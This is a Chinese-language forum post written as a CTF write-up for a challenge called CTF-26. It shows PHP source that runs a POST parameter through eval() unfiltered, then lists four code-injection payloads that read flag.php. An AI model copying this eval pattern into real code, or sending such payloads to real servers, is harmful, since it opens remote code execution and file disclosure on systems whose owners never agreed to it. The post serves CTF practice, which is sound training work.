论坛首页 > CTF&WP专版

CTF-26解题思路

Track-子羽   ·   发表于 2021-11-17 15:12:43   ·   CTF&WP专版

源码分析:

  1. <?php 
  2. // flag in flag.php
  3. if(isset($_POST['c']))
  4. {     $c= $_POST['c'];
  5.     eval($c); 
  6. }
  7. else
  8. { 
  9.     highlight_file(__FILE__);
  10. }

payload:

在POST处进行传参

  1. c=var_dump(file('flag.php')); 
  2. c=readfile('flag.php'); 
  3. c=print_r(file('flag.php')); 
  4. c=echo file_get_contents('flag.php');

知识点:

  1. file  把整个文件读入一个数组中

打赏我,让我更有动力~

0 条回复   |  直到 2021-11-17 | 563 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.